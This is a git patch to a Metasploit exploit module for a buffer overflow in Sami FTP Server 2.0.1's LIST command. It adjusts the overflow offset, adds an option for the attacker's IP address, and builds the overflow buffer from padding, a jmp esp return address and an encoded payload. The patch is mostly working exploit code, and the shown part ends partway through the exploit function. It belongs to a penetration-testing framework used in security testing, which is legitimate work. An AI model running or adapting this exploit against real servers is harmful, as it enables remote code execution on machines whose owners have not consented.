From fb90a1b497204a8ff1bd29b185ac7ff738654f09 Mon Sep 17 00:00:00 2001
From: dougsko <dougtko@gmail.com>
Date: Mon, 18 Mar 2013 16:18:04 -0300
Subject: [PATCH] Uses IP address length in offset calculation

---
 modules/exploits/windows/ftp/sami_ftpd_list.rb | 14 ++++++++++----
 1 file changed, 10 insertions(+), 4 deletions(-)

diff --git a/modules/exploits/windows/ftp/sami_ftpd_list.rb b/modules/exploits/windows/ftp/sami_ftpd_list.rb
index 5f501c96e2..52b8d9f12f 100644
--- a/modules/exploits/windows/ftp/sami_ftpd_list.rb
+++ b/modules/exploits/windows/ftp/sami_ftpd_list.rb
@@ -17,7 +17,7 @@ class Metasploit4 < Msf::Exploit::Remote
 			'Name'			 => 'Sami FTP Server 2.0.1 LIST Command Buffer Overflow',
 			'Description'	 => %q{
 					A buffer overflow is triggered when a long LIST
-				command is sent to the server and the user views the Log tab.
+				command is sent to the server while the user is viewing the Logs tab.
 			},
 			'Platform'		 => 'win',
 			'Author'		 =>
@@ -48,18 +48,24 @@ class Metasploit4 < Msf::Exploit::Remote
 						'Windows Universal',
 						{
 							'Ret' => 0x10028283, # jmp esp C:\Program Files\PMSystem\Temp\tmp0.dll
-							'Offset'   => 219,
+							'Offset'   => 225,
 						},
 					],
 				],
 			'DefaultTarget' => 0,
 			'DisclosureDate' => 'Feb 27 2013'))
+		register_options(
+			[
+				OptString.new('IPADDR', [true, 'Attacker\'s IP address'])
+			], self.class)
 	end
 
 	def exploit
 		connect_login
-
-		buf = rand_text(target['Offset'], payload_badchars)
+		sleep 1
+		
+		ip_length = datastore['IPADDR'].length - 3
+		buf = rand_text_alphanumeric(target['Offset'] - ip_length)
 		buf << [ target['Ret'] ].pack('V')
 		buf << payload.encoded